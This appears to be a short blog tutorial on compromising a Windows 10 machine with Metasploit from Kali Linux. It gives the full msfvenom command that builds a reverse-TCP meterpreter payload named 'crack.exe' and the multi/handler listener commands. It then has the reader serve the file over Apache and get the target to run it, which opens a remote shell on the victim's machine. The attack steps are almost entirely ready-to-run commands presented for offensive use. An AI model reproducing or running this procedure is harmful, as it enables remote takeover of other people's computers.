Exploit Windows 10


Exploiting Windows 10 (latest update) using 

metasploit (in KALI): Cyberator

Introduction:

The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. In this article, we’ll look at how this framework within Kali Linux can be used to attack a Windows 10 machine. 

This article assumes the installation of Kali Linux has been done and is reachable through a bridged connection from a Windows machine on Virtual-box.

Step 1:

- Open terminal in Kali and type the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<your IP> -f exe > /root/Desktop/crack.exe



Step 2:

Open terminal in Kali and type the following commands

   msfdb init
   msfconsole
   use exploit/multi/handler
   set payload windows/x64/meterpreter/reverse_tcp
   set lport 8080
   set lhost <your IP address>
   exploit


Step 3:

- Use apache2 command to start a local server so that the file could be accessed from other         system and paste the payload created into the /var/www/html folder



Step 4 :

- Access the file onto the windows system (target PC) and execute it.


Step 5:

- you will see a new meterpreter session opened in your Kali terminal. ☺


   

       Reviews and Comments will be appreciated. Thanks ☺

Comments

Popular posts from this blog

Exploiting Android using Kali Linux